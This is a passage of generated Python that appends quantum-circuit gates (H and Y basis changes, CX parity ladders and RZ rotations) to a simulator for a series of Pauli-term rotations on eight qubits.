    # entangle: parity ladder down to the rotation target
    for _c, _t in _ladder:
        sim.append(sim.CX(_c, _t))
    sim.append(sim.RZ(1.233693, 0))
    # un-entangle: ladder in reverse
    for _c, _t in reversed(_ladder):
        sim.append(sim.CX(_c, _t))
    # basis change out (same gates again)
    for _g, _q in zip(_gates, _qubits):
        sim.append(sim.H(_q) if _g == 'H' else sim.Y(_q))
# Generated Pauli-term rotation section: 8 basis-conjugation rounds around
# RZ(3.96871) on qubit 1, CX parity ladder over (7,6,5,4,3,2,1).
# Original gate sequence reproduced gate for gate, in order.
_rounds = [
    ('H', 'H', 'H', 'H'),
    ('Y', 'Y', 'Y', 'Y'),
    ('H', 'Y', 'H', 'Y'),
    ('Y', 'H', 'Y', 'H'),
    ('Y', 'Y', 'H', 'H'),
    ('H', 'H', 'Y', 'Y'),
    ('Y', 'H', 'H', 'Y'),
    ('H', 'Y', 'Y', 'H'),
]
_qubits = (7, 5, 1, 1)
_ladder = [(7, 6), (6, 5), (5, 4), (4, 3), (3, 2), (2, 1)]
for _gates in _rounds:
    # basis change in
    for _g, _q in zip(_gates, _qubits):
        sim.append(sim.H(_q) if _g == 'H' else sim.Y(_q))
    # entangle: parity ladder down to the rotation target
    for _c, _t in _ladder:
        sim.append(sim.CX(_c, _t))
    sim.append(sim.RZ(3.96871, 1))
    # un-entangle: ladder in reverse
    for _c, _t in reversed(_ladder):
        sim.append(sim.CX(_c, _t))
    # basis change out (same gates again)
    for _g, _q in zip(_gates, _qubits):
        sim.append(sim.H(_q) if _g == 'H' else sim.Y(_q))
# Generated Pauli-term rotation section: 8 basis-conjugation rounds around
# RZ(5.442531) on qubit 2, CX parity ladder over (7,6,5,4,3,2).
# Original gate sequence reproduced gate for gate, in order.
_rounds = [
    ('H', 'H', 'H', 'H'),
    ('Y', 'Y', 'Y', 'Y'),
    ('H', 'Y', 'H', 'Y'),
    ('Y', 'H', 'Y', 'H'),
    ('Y', 'Y', 'H', 'H'),
    ('H', 'H', 'Y', 'Y'),
    ('Y', 'H', 'H', 'Y'),
    ('H', 'Y', 'Y', 'H'),
]
_qubits = (7, 5, 2, 2)
_ladder = [(7, 6), (6, 5), (5, 4), (4, 3), (3, 2)]
for _gates in _rounds:
    # basis change in
    for _g, _q in zip(_gates, _qubits):
        sim.append(sim.H(_q) if _g == 'H' else sim.Y(_q))
    # entangle: parity ladder down to the rotation target
    for _c, _t in _ladder:
        sim.append(sim.CX(_c, _t))
    sim.append(sim.RZ(5.442531, 2))
    # un-entangle: ladder in reverse
    for _c, _t in reversed(_ladder):
        sim.append(sim.CX(_c, _t))
    # basis change out (same gates again)
    for _g, _q in zip(_gates, _qubits):
        sim.append(sim.H(_q) if _g == 'H' else sim.Y(_q))
sim.append(sim.H(7))
sim.append(sim.H(5))
sim.append(sim.H(3))
sim.append(sim.H(3))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.RZ(3.581851, 3))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.H(5))
sim.append(sim.H(3))
sim.append(sim.H(3))
sim.append(sim.Y(7))
sim.append(sim.Y(5))
sim.append(sim.Y(3))
sim.append(sim.Y(3))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.RZ(3.581851, 3))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.Y(5))
sim.append(sim.Y(3))
sim.append(sim.Y(3))
sim.append(sim.H(7))
sim.append(sim.Y(5))
sim.append(sim.H(3))
sim.append(sim.Y(3))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.RZ(3.581851, 3))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.Y(5))
sim.append(sim.H(3))
sim.append(sim.Y(3))
sim.append(sim.Y(7))
sim.append(sim.H(5))
sim.append(sim.Y(3))
sim.append(sim.H(3))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.RZ(3.581851, 3))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.H(5))
sim.append(sim.Y(3))
sim.append(sim.H(3))
sim.append(sim.Y(7))
sim.append(sim.Y(5))
sim.append(sim.H(3))
sim.append(sim.H(3))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.RZ(3.581851, 3))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.Y(5))
sim.append(sim.H(3))
sim.append(sim.H(3))
sim.append(sim.H(7))
sim.append(sim.H(5))
sim.append(sim.Y(3))
sim.append(sim.Y(3))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.RZ(3.581851, 3))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.H(5))
sim.append(sim.Y(3))
sim.append(sim.Y(3))
sim.append(sim.Y(7))
sim.append(sim.H(5))
sim.append(sim.H(3))
sim.append(sim.Y(3))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.RZ(3.581851, 3))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.H(5))
sim.append(sim.H(3))
sim.append(sim.Y(3))
sim.append(sim.H(7))
sim.append(sim.Y(5))
sim.append(sim.Y(3))
sim.append(sim.H(3))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.RZ(3.581851, 3))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.Y(5))
sim.append(sim.Y(3))
sim.append(sim.H(3))
sim.append(sim.H(7))
sim.append(sim.H(6))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(1.736069, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(6, 1))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.H(6))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.Y(7))
sim.append(sim.Y(6))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(1.736069, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(6, 1))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.Y(6))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.H(7))
sim.append(sim.Y(6))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(1.736069, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(6, 1))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.Y(6))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.Y(7))
sim.append(sim.H(6))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(1.736069, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(6, 1))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.H(6))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.Y(7))
sim.append(sim.Y(6))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(1.736069, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(6, 1))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.Y(6))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.H(7))
sim.append(sim.H(6))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(1.736069, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(6, 1))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.H(6))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.Y(7))
sim.append(sim.H(6))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(1.736069, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(6, 1))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.H(6))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.H(7))
sim.append(sim.Y(6))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(1.736069, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(6, 1))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.Y(6))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.H(7))
sim.append(sim.H(6))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.509321, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(6, 2))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.H(6))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.Y(7))
sim.append(sim.Y(6))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.509321, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(6, 2))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.Y(6))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.H(7))
sim.append(sim.Y(6))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.509321, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(6, 2))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.Y(6))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.Y(7))
sim.append(sim.H(6))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.509321, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(6, 2))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.H(6))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.Y(7))
sim.append(sim.Y(6))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.509321, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(6, 2))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.Y(6))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.H(7))
sim.append(sim.H(6))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.509321, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(6, 2))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.H(6))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.Y(7))
sim.append(sim.H(6))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.509321, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(6, 2))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.H(6))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.H(7))
sim.append(sim.Y(6))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.509321, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(6, 2))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.Y(6))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.H(7))
sim.append(sim.H(6))
sim.append(sim.H(1))
sim.append(sim.H(1))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(0.692815, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(6, 2))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.H(6))
sim.append(sim.H(1))
sim.append(sim.H(1))
sim.append(sim.Y(7))
sim.append(sim.Y(6))
sim.append(sim.Y(1))
sim.append(sim.Y(1))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(0.692815, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(6, 2))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.Y(6))
sim.append(sim.Y(1))
sim.append(sim.Y(1))
sim.append(sim.H(7))
sim.append(sim.Y(6))
sim.append(sim.H(1))
sim.append(sim.Y(1))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(0.692815, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(6, 2))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.Y(6))
sim.append(sim.H(1))
sim.append(sim.Y(1))
sim.append(sim.Y(7))
sim.append(sim.H(6))
sim.append(sim.Y(1))
sim.append(sim.H(1))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(0.692815, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(6, 2))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.H(6))
sim.append(sim.Y(1))
sim.append(sim.H(1))
sim.append(sim.Y(7))
sim.append(sim.Y(6))
sim.append(sim.H(1))
sim.append(sim.H(1))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(0.692815, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(6, 2))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.Y(6))
sim.append(sim.H(1))
sim.append(sim.H(1))
sim.append(sim.H(7))
sim.append(sim.H(6))
sim.append(sim.Y(1))
sim.append(sim.Y(1))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(0.692815, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(6, 2))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.H(6))
sim.append(sim.Y(1))
sim.append(sim.Y(1))
sim.append(sim.Y(7))
sim.append(sim.H(6))
sim.append(sim.H(1))
sim.append(sim.Y(1))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(0.692815, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(6, 2))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.H(6))
sim.append(sim.H(1))
sim.append(sim.Y(1))
sim.append(sim.H(7))
sim.append(sim.Y(6))
sim.append(sim.Y(1))
sim.append(sim.H(1))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(0.692815, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(6, 2))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.Y(6))
sim.append(sim.Y(1))
sim.append(sim.H(1))
sim.append(sim.H(7))
sim.append(sim.H(6))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.448221, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(6, 3))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.H(6))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.Y(7))
sim.append(sim.Y(6))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.448221, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(6, 3))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.Y(6))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.H(7))
sim.append(sim.Y(6))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.448221, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(6, 3))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.Y(6))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.Y(7))
sim.append(sim.H(6))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.448221, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(6, 3))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.H(6))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.Y(7))
sim.append(sim.Y(6))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.448221, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(6, 3))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.Y(6))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.H(7))
sim.append(sim.H(6))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.448221, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(6, 3))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.H(6))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.Y(7))
sim.append(sim.H(6))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.448221, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(6, 3))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.H(6))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.H(7))
sim.append(sim.Y(6))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.448221, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(6, 3))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.Y(6))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.H(7))
sim.append(sim.H(6))
sim.append(sim.H(1))
sim.append(sim.H(1))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(2.525158, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(6, 3))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.H(6))
sim.append(sim.H(1))
sim.append(sim.H(1))
sim.append(sim.Y(7))
sim.append(sim.Y(6))
sim.append(sim.Y(1))
sim.append(sim.Y(1))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(2.525158, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(6, 3))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.Y(6))
sim.append(sim.Y(1))
sim.append(sim.Y(1))
sim.append(sim.H(7))
sim.append(sim.Y(6))
sim.append(sim.H(1))
sim.append(sim.Y(1))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(2.525158, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(6, 3))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.Y(6))
sim.append(sim.H(1))
sim.append(sim.Y(1))
sim.append(sim.Y(7))
sim.append(sim.H(6))
sim.append(sim.Y(1))
sim.append(sim.H(1))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(2.525158, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(6, 3))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.H(6))
sim.append(sim.Y(1))
sim.append(sim.H(1))
sim.append(sim.Y(7))
sim.append(sim.Y(6))
sim.append(sim.H(1))
sim.append(sim.H(1))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(2.525158, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(6, 3))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.Y(6))
sim.append(sim.H(1))
sim.append(sim.H(1))
sim.append(sim.H(7))
sim.append(sim.H(6))
sim.append(sim.Y(1))
sim.append(sim.Y(1))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(2.525158, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(6, 3))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.H(6))
sim.append(sim.Y(1))
sim.append(sim.Y(1))
sim.append(sim.Y(7))
sim.append(sim.H(6))
sim.append(sim.H(1))
sim.append(sim.Y(1))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(2.525158, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(6, 3))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.H(6))
sim.append(sim.H(1))
sim.append(sim.Y(1))
sim.append(sim.H(7))
sim.append(sim.Y(6))
sim.append(sim.Y(1))
sim.append(sim.H(1))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(2.525158, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(6, 3))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.Y(6))
sim.append(sim.Y(1))
sim.append(sim.H(1))
sim.append(sim.H(7))
sim.append(sim.H(6))
sim.append(sim.H(2))
sim.append(sim.H(2))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.RZ(1.632131, 2))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(6, 3))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.H(6))
sim.append(sim.H(2))
sim.append(sim.H(2))
sim.append(sim.Y(7))
sim.append(sim.Y(6))
sim.append(sim.Y(2))
sim.append(sim.Y(2))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.RZ(1.632131, 2))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(6, 3))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.Y(6))
sim.append(sim.Y(2))
sim.append(sim.Y(2))
sim.append(sim.H(7))
sim.append(sim.Y(6))
sim.append(sim.H(2))
sim.append(sim.Y(2))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.RZ(1.632131, 2))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(6, 3))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.Y(6))
sim.append(sim.H(2))
sim.append(sim.Y(2))
sim.append(sim.Y(7))
sim.append(sim.H(6))
sim.append(sim.Y(2))
sim.append(sim.H(2))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.RZ(1.632131, 2))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(6, 3))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.H(6))
sim.append(sim.Y(2))
sim.append(sim.H(2))
sim.append(sim.Y(7))
sim.append(sim.Y(6))
sim.append(sim.H(2))
sim.append(sim.H(2))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.RZ(1.632131, 2))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(6, 3))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.Y(6))
sim.append(sim.H(2))
sim.append(sim.H(2))
sim.append(sim.H(7))
